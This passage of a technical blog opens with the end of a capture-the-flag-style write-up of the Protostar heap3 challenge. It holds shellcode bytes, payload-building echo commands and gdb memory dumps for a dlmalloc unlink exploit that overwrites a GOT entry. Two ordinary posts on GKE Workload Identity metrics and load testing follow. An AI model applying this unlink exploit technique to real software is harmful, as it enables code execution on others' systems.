0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 4, 0x08048790 in puts@plt ()

Now the first chunk has been freed and address 0x804c008 has a pointer 0x0804c028 to the second chunk. If we continue, the program runs the printf("dynamite failed?\n"); line.

(gdb) c
Continuing.
dynamite failed?

Program exited with code 021.
0x804c000: Error while running hook_stop:
Cannot access memory at address 0x804c000

Crafting the exploit

Let’s work backwards. We can use unlink() to write the four byte address of a call to winner() to the GOT entry for puts(). Use objdump to find the address of winner().

user@protostar:$ objdump -t /opt/protostar/bin/heap3 | grep winner
08048864 g     F .text    00000025              winner

We can’t just put 0x08048864 in the GOT entry at 0x804b128 (why?). In order to call winner(), we’ll need to craft a payload that does so. Such a payload is often called “shellcode.” The following assembly code will do.

mov eax, 0x8048864
call eax

Using an online x86 assembler, the above in raw assembly is \xB8\x64\x88\x04\x08\xFF\xD0. We can store this in the heap’s first chunk whose data area starts at 0x804c008. Now we want to write 0x804c008 into the GOT entry for puts() at 0x804b128. Let’s go back to the unlink statements.

BK = *(P + 12);
FD = *(P + 8);
*(FD + 12) = BK;
*(BK + 8) = FD;

BK is the address of \xB8\x64\x88\x04\x08\xFF\xD0. Where should we store that? Let’s put it in the first chunk at 0x804c014. The first chunk’s data starts at 0x804c008, but we’ve seen the first byte is changed by dlmalloc when it’s freed. We don’t want our shellcode to be changed so we put it at a safe distance in the data at a +12-byte offset. 12 A’s can pad the shellcode enough to push it 12-bytes into the heap. We have enough info to construct the first command line argument.

user@protostar:$ echo -en "AAAAAAAAAAAA\xB8\x64\x88\x04\x08\xFF\xD0" > /tmp/A

We’ll store FD and BK in the third chunk. We can use the second command line argument to overwrite the size of the third chunk to be greater than 80 to trigger the unlink() macro when the third chunk is free()’d. The second argument needs to have enough characters to overflow its chunk. The chunk’s data starts at 0x804c030 and ends 32 bytes later at 0x804c050. The third chunk’s size is four bytes later at 0x804c054. So we can use 32 + 4 = 36 characters as padding. Let’s pick 100 as the size of the third chunk. 100 = 0x64. We also have to set the last bit to 1 to indicate the second or previous chunk is in use. So the third chunk’s size should be 0x65. So our second argument can have 36 B’s as padding followed by \x65.

user@protostar:$ echo -en "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x65" > /tmp/B

Now we craft the third and final argument. The structure for it will be some padding + some four bytes to be determined + some size + FD + BK.

The third chunk starts at 0x804c050. It used to end 40 bytes later at 0x804c078, but we overwrote its size to 0x65 or 100. So now it ends 100 bytes later at 0x804c0b4. We want to trigger unlink() on the third chunk when we free() it. We’ve already ensured it’s not a fastbin by setting its size to be greater than 80 bytes. The next condition is to make dlmalloc consolidate this chunk with either the chunk before or after. Since we’re using the previous chunk, let’s fool dlmalloc into thinking the next chunk is free.

I know what you’re thinking. There’s no fourth chunk. That’s right, but we’ll make dlmalloc think there is. In order to check a chunk is free, dlmalloc looks at the PREV_INUSE bit of the next chunk. To find the next chunk, dlmalloc adds the size of the current chunk to the current chunk’s address. You can see this at line 3259.

if (!(inuse_bit_at_offset(next, nextsz)))   /* consolidate forward */

inuse_bit_at_offset() is a macro defined at line 1410.

#define inuse_bit_at_offset(p, s) \
  (chunk_at_offset((p), (s))->size & PREV_INUSE)

chunk_at_offset() is defined at line 1381.

#define chunk_at_offset(p, s)  BOUNDED_1((mchunkptr)(((char*)(p)) + (s)))

So let’s write a small size at 0x804c0b8 to make dlmalloc think the fifth chunk is close by and so we don’t have to add too much padding to our third argument. A size like 0x20. We’ll have to write it as \x00\x00\x00\x20. But we have a problem here. C treats \x00 as the end of a string, and thus strcpy() will stop copying any string up to and including that NUL. We won’t be able to add any more bytes after that. This means we cannot insert \x00 in the middle of any of our inputs.

But all is not lost. We want a small number for the fourth chunk’s size. What’s another way of summing to a small number, at least in the way computers represent integers? In non-modular arithmetic, the only way two integers can produce a small sum is if they themselves are smaller. In modular arithmetic, a small integer can be the sum of large numbers that are greater than the modulus.

Take a closer look at how chunk_at_offset() is defined. It sums two numbers with no sanity checks. So we can write a really big number with no null bytes that strcpy() won’t stop on and will make dlmalloc think the next fifth chunk is close by. Even better, we can use the first byte of the fourth chunk as the fifth chunk’s size. How can we make dlmalloc think the fifth chunk is four bytes ahead of the fourth chunk? We do this with 0xfffffffc which is -2 in two’s complement for signed integers. So 0xfffffffc at 0x804c0b8 will point to a fifth chunk’s size four bytes earlier at 0x804c0b4. This word’s last bit must be set to 0 to indicate the fourth chunk is free. We can simply use 0xfffffffc again here.

We want (FD + 12) to equal 0x804b128. So FD should be 0x804b128 - 12 = 0x804b11c. In the above we decided to make BK 0x0804c014. We have

user@protostar:/tmp$ echo -en "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08\x14\xc0\x04\x08" > /tmp/C

92 C’s of padding, two 0xfffffffc words, FD, followed by BK.

Checking it works

With the same gdb session as above, run the program with the three arguments.

(gdb) r $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
0x804c000: Error while running hook_stop:
Cannot access memory at address 0x804c000

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  in common/malloc.c

Let’s continue until we stop at the first free() call.

(gdb) c
Continuing.
...

Breakpoint 3, free (mem=0x804c058) at common/malloc.c:3583
3583  in common/malloc.c

Examine the GOT entry for puts().

(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x08048796

Continue and see that free(c) has overwritten the contents to the address of our shellcode!

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c030) at common/malloc.c:3583
3583  in common/malloc.c
(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x0804c014

Let the rest of the program run to see winner() is called.

Breakpoint 4, 0x08048790 in puts@plt ()
(gdb) si
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
0x0804c014 in ?? ()
(gdb) si
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
0x0804c019 in ?? ()
(gdb) si
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
winner () at heap3/heap3.c:8
8 heap3/heap3.c: No such file or directory.
  in heap3/heap3.c
(gdb) c
Continuing.
that wasn't too bad now, was it? @ 1587442625

Program received signal SIGSEGV, Segmentation fault.
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
0x0804c01b in ?? ()

Now let’s run it without gdb.

user@protostar:~$ /opt/protostar/bin/./heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
that wasn't too bad now, was it? @ 1587443061
Segmentation fault

Amazing.

References

How to Expose a Localhost-only Endpoint on GKE

2020-04-13T12:24:46-04:00

In my previous post I wrote about how to load test GKE Workload Identity. In this post I’ll describe how to get metrics from gke-metadata-server, the part of Workload Identity that runs on your GKE clusters’ nodes. This solution is a temporary workaround until GKE provides a better way to get metrics on gke-metadata-server.

Gke-metadata-server runs as a K8s DaemonSet. It exposes metrics about itself in Prometheus text-based format. I want to have an external scraper make HTTP requests to periodically collect these metrics. Unfortunately, the Prometheus HTTP server only listens on the Container’s localhost interface. So how can we expose these metrics, i.e. make the HTTP endpoint available externally?

tl;dr lessons learned

socat is awesome.
If something you need is running on a computer you control, you can always find a way extract info from it if you’re resourceful enough.

My specific GKE cluster configuration

GKE masters and nodes running version 1.15.9-gke.22
regional cluster in Google Cloud Platform (GCP) (not on-premise)
6 GKE nodes that are n1-standard-32 GCE instances in one node pool
each node is configured to have a maximum of 32 Pods
cluster and node pool have WI enabled

Notice the DaemonSet is configured with .spec.template.spec.hostNetwork: true below. This means the HTTP server is also listening on the GKE node’s localhost interface.

apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  labels:
    addonmanager.kubernetes.io/mode: Reconcile
    k8s-app: gke-metadata-server
  name: gke-metadata-server
  namespace: kube-system
spec:
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: gke-metadata-server
  template:
    metadata:
      annotations:
        components.gke.io/component-name: gke-metadata-server
        components.gke.io/component-version: 0.2.21
        scheduler.alpha.kubernetes.io/critical-pod: '"''"'
      creationTimestamp: null
      labels:
        addonmanager.kubernetes.io/mode: Reconcile
        k8s-app: gke-metadata-server
    spec:
      containers:
      - command:
        - /gke-metadata-server
        - --logtostderr
        - --token-exchange-endpoint=https://securetoken.googleapis.com/v1/identitybindingtoken
        - --identity-namespace=[REDACTED]
        - --identity-provider-id=https://container.googleapis.com/v1/projects/[REDACTED]/locations/europe-west1/clusters/[REDACTED]
        - --passthrough-ksa-list=kube-system:container-watcher-pod-reader,kube-system:event-exporter-sa,kube-system:fluentd-gcp-scaler,kube-system:heapster,kube-system:kube-dns,kube-system:metadata-agent,kube-system:network-metering-agent,kube-system:securityprofile-controller,istio-system:istio-ingressgateway-service-account,istio-system:cluster-local-gateway-service-account,csm:csm-sync-agent,knative-serving:controller
        - --attributes=cluster-name=[REDACTED],cluster-uid=[REDACTED],cluster-location=europe-west1
        - --enable-identity-endpoint=true
        - --cluster-uid=[REDACTED]
        image: gke.gcr.io/gke-metadata-server:20200218_1145_RC0
        imagePullPolicy: IfNotPresent
        livenessProbe:
          failureThreshold: 3
          httpGet:
            host: 127.0.0.1
            path: /healthz
            port: 54898
            scheme: HTTP
          initialDelaySeconds: 10
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 1
        name: gke-metadata-server
        resources:
          limits:
            cpu: 100m
            memory: 100Mi
          requests:
            cpu: 100m
            memory: 100Mi
        securityContext:
          privileged: true
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
        volumeMounts:
        - mountPath: /var/lib/kubelet/kubeconfig
          name: kubelet-credentials
          readOnly: true
        - mountPath: /var/lib/kubelet/pki/
          name: kubelet-certs
          readOnly: true
        - mountPath: /var/run/
          name: container-runtime-interface
        - mountPath: /etc/srv/kubernetes/pki
          name: kubelet-pki
          readOnly: true
        - mountPath: /etc/ssl/certs/
          name: ca-certificates
          readOnly: true
      dnsPolicy: Default
      hostNetwork: true
      nodeSelector:
        beta.kubernetes.io/os: linux
        iam.gke.io/gke-metadata-server-enabled: "true"
      priorityClassName: system-node-critical
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      serviceAccount: gke-metadata-server
      serviceAccountName: gke-metadata-server
      terminationGracePeriodSeconds: 30
      tolerations:
      - effect: NoExecute
        operator: Exists
      - effect: NoSchedule
        operator: Exists
      volumes:
      - hostPath:
          path: /var/lib/kubelet/pki/
          type: Directory
        name: kubelet-certs
      - hostPath:
          path: /var/lib/kubelet/kubeconfig
          type: File
        name: kubelet-credentials
      - hostPath:
          path: /var/run/
          type: Directory
        name: container-runtime-interface
      - hostPath:
          path: /etc/srv/kubernetes/pki/
          type: Directory
        name: kubelet-pki
      - hostPath:
          path: /etc/ssl/certs/
          type: Directory
        name: ca-certificates
  templateGeneration: 7
  updateStrategy:
    rollingUpdate:
      maxUnavailable: 1
    type: RollingUpdate

We can run a separate workload on this cluster that uses socat to proxy HTTP requests to gke-metadata-server. socat stands for socket cat and is a multipurpose relay. It’s netcat on steroids and can relay any kind of packets not just TCP and UDP.

This proxy is deployed as a DaemonSet to make it easy to have a one-to-one correspondence with each node-local gke-metadata-server Pod. The DaemonSet will also need to have .spec.template.spec.hostNetwork: true so that it can share the same network namespace.

Here’s the proxy DaemonSet YAML. I use the Docker image alpine/socat:1.7.3.4-r0 which is a tiny 3.61MB. The arguments ["TCP-LISTEN:54899,reuseaddr,fork", "TCP:127.0.0.1:54898"] tell socat to forward traffic from 0.0.0.0:54899 to 127.0.0.1:54898 which is where the Prometheus metrics are. fork tells socat to

After establishing a connection, handles its channel in a child process and keeps the parent process attempting to produce more connections, either by listening or by connecting in a loop

— http://www.dest-unreach.org/socat/doc/socat.html#OPTION_FORK

cat proxy-daemonset.yaml

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: gke-metadata-server-metrics-proxy
  namespace: monitoring
spec:
  selector:
    matchLabels:
      app: gke-metadata-server-metrics-proxy
  template:
    metadata:
      labels:
        app: gke-metadata-server-metrics-proxy
    spec:
      hostNetwork: true
      containers:
      - name: gke-metadata-server-metrics-proxy
        image: alpine/socat:1.7.3.4-r0@sha256:6786951b55e321e3968ba1c3786cb79b768f85d83d438f085336442b3bcef67a
        args: ["TCP-LISTEN:54899,reuseaddr,fork", "TCP:127.0.0.1:54898"]
        ports:
        - name: prom-metrics
          containerPort: 54899
          protocol: TCP
        livenessProbe:
          httpGet:
            host: 127.0.0.1
            path: /metricz
            port: 54899
            scheme: HTTP
        resources:
          limits:
            cpu: 100m
            memory: 100Mi
          requests:
            cpu: 100m
            memory: 100Mi

Apply the DaemonSet.

kubectl --context [CONTEXT] apply -f proxy-daemonset.yaml

Now make an HTTP request to any GKE node IP at port 54899.

kubectl --context [CONTEXT] -n monitoring get pods --selector app=gke-metadata-server-metrics-proxy -o wide

NAME                                      READY   STATUS    RESTARTS   AGE     IP              NODE                             NOMINATED NODE   READINESS GATES
gke-metadata-server-metrics-proxy-dvlpg   1/1     Running   0          4d19h   10.200.208.6    my-cluster-n1-s-32-dfabe6b6-38px              
gke-metadata-server-metrics-proxy-dx4lq   1/1     Running   0          4d19h   10.200.208.8    my-cluster-n1-s-32-dfabe6b6-mnlg              
gke-metadata-server-metrics-proxy-j9p49   1/1     Running   0          4d19h   10.200.208.7    my-cluster-n1-s-32-dfabe6b6-vv9s              
gke-metadata-server-metrics-proxy-jvvjw   1/1     Running   0          4d19h   10.200.208.12   my-cluster-n1-s-32-192fa3d9-wb2c              
gke-metadata-server-metrics-proxy-k5sqd   1/1     Running   0          4d19h   10.200.208.10   my-cluster-n1-s-32-55dd75ff-6l40              
gke-metadata-server-metrics-proxy-tdhkn   1/1     Running   0          4d19h   10.200.208.9    my-cluster-n1-s-32-55dd75ff-jqgk              

http GET '10.200.208.6:54899/metricz' | head -n 20

# HELP go_gc_duration_seconds A summary of the GC invocation durations.
# TYPE go_gc_duration_seconds summary
go_gc_duration_seconds{quantile="0"} 2.8295e-05
go_gc_duration_seconds{quantile="0.25"} 3.6269e-05
go_gc_duration_seconds{quantile="0.5"} 5.2122e-05
go_gc_duration_seconds{quantile="0.75"} 7.585e-05
go_gc_duration_seconds{quantile="1"} 0.099987877
go_gc_duration_seconds_sum 7.738486774
go_gc_duration_seconds_count 6809
# HELP go_goroutines Number of goroutines that currently exist.
# TYPE go_goroutines gauge
go_goroutines 47
# HELP go_info Information about the Go environment.
# TYPE go_info gauge
go_info{version="go1.14rc1"} 1
# HELP go_memstats_alloc_bytes Number of bytes allocated and still in use.
# TYPE go_memstats_alloc_bytes gauge
go_memstats_alloc_bytes 2.4743056e+07
# HELP go_memstats_alloc_bytes_total Total number of bytes allocated, even if freed.
# TYPE go_memstats_alloc_bytes_total counter

Voila. The important metrics are:

metadata_server_request_count
metadata_server_request_durations_bucket

I have these Prometheus recording rules to calculate RPS and request duration percentiles.

groups:
- name: gke-metadata-server
  rules:
  # Compute a 5-minute rate for the counter `metadata_server_request_count`.
  - record: metadata_server_request_count:rate5m
    expr: rate(metadata_server_request_count[5m])
  # Compute latency percentiles for the histogram metric
  # `metadata_server_request_durations_bucket` over 5-minute increments for each label
  # combination.
  - record: metadata_server_request_duration:p99
    expr: histogram_quantile(0.99, rate(metadata_server_request_durations_bucket[5m]))
  - record: metadata_server_request_duration:p95
    expr: histogram_quantile(0.95, rate(metadata_server_request_durations_bucket[5m]))
  - record: metadata_server_request_duration:p90
    expr: histogram_quantile(0.90, rate(metadata_server_request_durations_bucket[5m]))
  - record: metadata_server_request_duration:p50
    expr: histogram_quantile(0.50, rate(metadata_server_request_durations_bucket[5m]))
  - record: metadata_server_request_duration:mean
    expr: rate(metadata_server_request_durations_sum[5m]) / rate(metadata_server_request_durations_count[5m])
  # Compute latency percentiles for the histogram metric
  # `metadata_server_request_durations_bucket` over 5-minute increments and aggregate all
  # labels. We must aggregate here instead of in Grafana because averaging percentiles doesn’t
  # work. To compute a percentile, you need the original population of events. The math is just
  # broken. An average of a percentile is meaningless.
  - record: metadata_server_all_request_duration:p99
    expr: histogram_quantile(0.99, sum(rate(metadata_server_request_durations_bucket[5m])) by (le))
  - record: metadata_server_all_request_duration:p95
    expr: histogram_quantile(0.95, sum(rate(metadata_server_request_durations_bucket[5m])) by (le))
  - record: metadata_server_all_request_duration:p90
    expr: histogram_quantile(0.90, sum(rate(metadata_server_request_durations_bucket[5m])) by (le))
  - record: metadata_server_all_request_duration:p50
    expr: histogram_quantile(0.50, sum(rate(metadata_server_request_durations_bucket[5m])) by (le))
  - record: metadata_server_all_request_duration:mean
    expr: rate(metadata_server_request_durations_sum[5m]) / rate(metadata_server_request_durations_count[5m])
  # Compute latency percentiles for the histogram metric `outgoing_request_latency_bucket` over
  # 5-minute increments for each label combination.
  - record: outgoing_request_latency:p99
    expr: histogram_quantile(0.99, rate(outgoing_request_latency_bucket[5m]))
  - record: outgoing_request_latency:p95
    expr: histogram_quantile(0.95, rate(outgoing_request_latency_bucket[5m]))
  - record: outgoing_request_latency:p90
    expr: histogram_quantile(0.90, rate(outgoing_request_latency_bucket[5m]))
  - record: outgoing_request_latency:p50
    expr: histogram_quantile(0.50, rate(outgoing_request_latency_bucket[5m]))
  - record: outgoing_request_latency:mean
    expr: rate(outgoing_request_latency_sum[5m]) / rate(outgoing_request_latency_count[5m])
  # Compute latency percentiles for the histogram metric `outgoing_request_latency_bucket` over
  # 5-minute increments and aggregate all labels. We must aggregate here instead of in Grafana
  # because averaging percentiles doesn’t work. To compute a percentile, you need the original
  # population of events. The math is just broken. An average of a percentile is meaningless.
  - record: outgoing_all_request_latency:p99
    expr: histogram_quantile(0.99, sum(rate(outgoing_request_latency_bucket[5m])) by (le))
  - record: outgoing_all_request_latency:p95
    expr: histogram_quantile(0.95, sum(rate(outgoing_request_latency_bucket[5m])) by (le))
  - record: outgoing_all_request_latency:p90
    expr: histogram_quantile(0.90, sum(rate(outgoing_request_latency_bucket[5m])) by (le))
  - record: outgoing_all_request_latency:p50
    expr: histogram_quantile(0.50, sum(rate(outgoing_request_latency_bucket[5m])) by (le))
  - record: outgoing_all_request_latency:mean
    expr: rate(outgoing_request_latency_sum[5m]) / rate(outgoing_request_latency_count[5m])

Thanks to @mikedanese for the intial idea of using socat.

3 Levels of Load Testing GKE Workload Identity

2020-04-01T10:21:11-04:00

I manage multitenant Google Kubernetes Engine (GKE) clusters for stateless backend services at work. Google recently graduated GKE’s Workload Identity (WI) feature to generally available (GA). When my team used WI during its beta stage, it seemed to fail when there were more than 16 requests per second (RPS) on one GKE node to retrieve Google access tokens.

Before we knew about this low RPS failure threshold, we told many internal engineering teams to go ahead and use the feature. In hindsight, we should’ve load-tested the feature before making it generally available internally especially since it wasn’t even GA publicly.

My efforts to load test WI have grown more sophisticated over time. This post describes the progression. It’s like the “4 Levels of …” Epicurious Youtube videos. The goal here is to find out at what RPS WI starts to fail and to try to learn some generalizable lessons from load testing vendor-managed services.

tl;dr lessons learned

always load test new features above and beyond what you expect your production load will be
use proper load testing tools and not bash for loops

My specific GKE cluster configuration

GKE masters and nodes running version 1.15.9-gke.22
regional cluster in Google Cloud Platform (GCP) (not on-premise)
4 GKE nodes that are n1-standard-32 GCE instances in one node pool
each node is configured to have a maximum of 32 Pods
cluster and node pool have WI enabled

High level of what Workload Identity is and how it works

Workloads on GKE often need to access GCP resources like PubSub or CloudSQL. In order to do so, your workload needs to use a Google Service Account (GSA) key that is authorized to access those resources. So you end up creating keys for all your GSA’s and copy-pasting these keys into Kubernetes Secrets for your workloads. This is insecure and not maintainable if you are a company that has dozens of engineering teams and hundreds of workloads.

So GCP offered WI which allows a Kubernetes Service Account (KSA) to be associated with a GSA. If a workload can run with a certain KSA, it’ll transparently get the Google access token for the associated GSA. No manual copy-pasting GSA keys!

How does this work? You have to enable WI on your cluster and node pool. This creates a gke-metadata-server DaemonSet in the kube-system namespace. gke-metadata-server is the entrypoint to the whole WI system. Here’s a nice Google Cloud Next conference talk with more details.

gke-metadata-server is the only part of WI that is exposed to GKE users, i.e. runs on machines you control. It’s like the Verizon FiOS box in your basement. You control your house, but there’s a little box that Verizon owns and operates in there. All other parts of WI run on GCP infrastructure that you can’t see. When I saw failures with WI, it all seemed to happen in gke-metadata-server. So that’s what I’ll load test.

Here’s the gke-metadata-server DaemonSet YAML for reference. As of the time of this writing the image is gke.gcr.io/gke-metadata-server:20200218_1145_RC0. You might see different behavior with different images.

apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  creationTimestamp: "2019-10-15T17:04:40Z"
  generation: 8
  labels:
    addonmanager.kubernetes.io/mode: Reconcile
    k8s-app: gke-metadata-server
  name: gke-metadata-server
  namespace: kube-system
  resourceVersion: "138588210"
  selfLink: /apis/extensions/v1beta1/namespaces/kube-system/daemonsets/gke-metadata-server
  uid: e06885d8-ef6d-11e9-88c9-42010a8c0110
spec:
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: gke-metadata-server
  template:
    metadata:
      annotations:
        components.gke.io/component-name: gke-metadata-server
        components.gke.io/component-version: 0.2.21
        scheduler.alpha.kubernetes.io/critical-pod: '"''"'
      creationTimestamp: null
      labels:
        addonmanager.kubernetes.io/mode: Reconcile
        k8s-app: gke-metadata-server
    spec:
      containers:
      - command:
        - /gke-metadata-server
        - --logtostderr
        - --token-exchange-endpoint=https://securetoken.googleapis.com/v1/identitybindingtoken
        - --identity-namespace=[redacted].svc.id.goog
        - --identity-provider-id=https://container.googleapis.com/v1/projects/[redacted]/locations/asia-east1/clusters/[redacted]
        - --passthrough-ksa-list=kube-system:container-watcher-pod-reader,kube-system:event-exporter-sa,kube-system:fluentd-gcp-scaler,kube-system:heapster,kube-system:kube-dns,kube-system:metadata-agent,kube-system:network-metering-agent,kube-system:securityprofile-controller,istio-system:istio-ingressgateway-service-account,istio-system:cluster-local-gateway-service-account,csm:csm-sync-agent,knative-serving:controller
        - --attributes=cluster-name=[redacted],cluster-uid=[redacted],cluster-location=asia-east1
        - --enable-identity-endpoint=true
        - --cluster-uid=[redacted]
        image: gke.gcr.io/gke-metadata-server:20200218_1145_RC0
        imagePullPolicy: IfNotPresent
        livenessProbe:
          failureThreshold: 3
          httpGet:
            host: 127.0.0.1
            path: /healthz
            port: 54898
            scheme: HTTP
          initialDelaySeconds: 10
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 1
        name: gke-metadata-server
        resources:
          limits:
            cpu: 100m
            memory: 100Mi
          requests:
            cpu: 100m
            memory: 100Mi
        securityContext:
          privileged: true
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
        volumeMounts:
        - mountPath: /var/lib/kubelet/kubeconfig
          name: kubelet-credentials
          readOnly: true
        - mountPath: /var/lib/kubelet/pki/
          name: kubelet-certs
          readOnly: true
        - mountPath: /var/run/
          name: container-runtime-interface
        - mountPath: /etc/srv/kubernetes/pki
          name: kubelet-pki
          readOnly: true
        - mountPath: /etc/ssl/certs/
          name: ca-certificates
          readOnly: true
      dnsPolicy: Default
      hostNetwork: true
      nodeSelector:
        beta.kubernetes.io/os: linux
        iam.gke.io/gke-metadata-server-enabled: "true"
      priorityClassName: system-node-critical
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      serviceAccount: gke-metadata-server
      serviceAccountName: gke-metadata-server
      terminationGracePeriodSeconds: 30
      tolerations:
      - effect: NoExecute
        operator: Exists
      - effect: NoSchedule
        operator: Exists
      volumes:
      - hostPath:
          path: /var/lib/kubelet/pki/
          type: Directory
        name: kubelet-certs
      - hostPath:
          path: /var/lib/kubelet/kubeconfig
          type: File
        name: kubelet-credentials
      - hostPath:
          path: /var/run/
          type: Directory
        name: container-runtime-interface
      - hostPath:
          path: /etc/srv/kubernetes/pki/
          type: Directory
        name: kubelet-pki
      - hostPath:
          path: /etc/ssl/certs/
          type: Directory
        name: ca-certificates
  templateGeneration: 8
  updateStrategy:
    rollingUpdate:
      maxUnavailable: 1
    type: RollingUpdate

Level 1

What kind of load am I putting on gke-metadata-server? Since this DaemonSet exists to give out Google access tokens, I’ll send it HTTP requests asking for such tokens.

I built a Docker image with the following Dockerfile.

FROM google/cloud-sdk
ENTRYPOINT while true; do for i in {1..20}; do curl -X GET https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=$(gcloud auth print-access-token) & done; wait; done;

Then I created the following K8s Deployment YAML.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: wi-test
  namespace: [K8S_NAMESPACE]
spec:
  replicas: 7
  selector:
    matchLabels:
      app: wi-test
  template:
    metadata:
      labels:
        app: wi-test
    spec:
      nodeSelector:
        kubernetes.io/hostname: [NODE-NAME]
      containers:
      - image: my-docker-image
        name: workload-identity-test

I ran seven of these Pods on a single node (see the nodeSelector above) to target a single instance of gke-metadata-server.

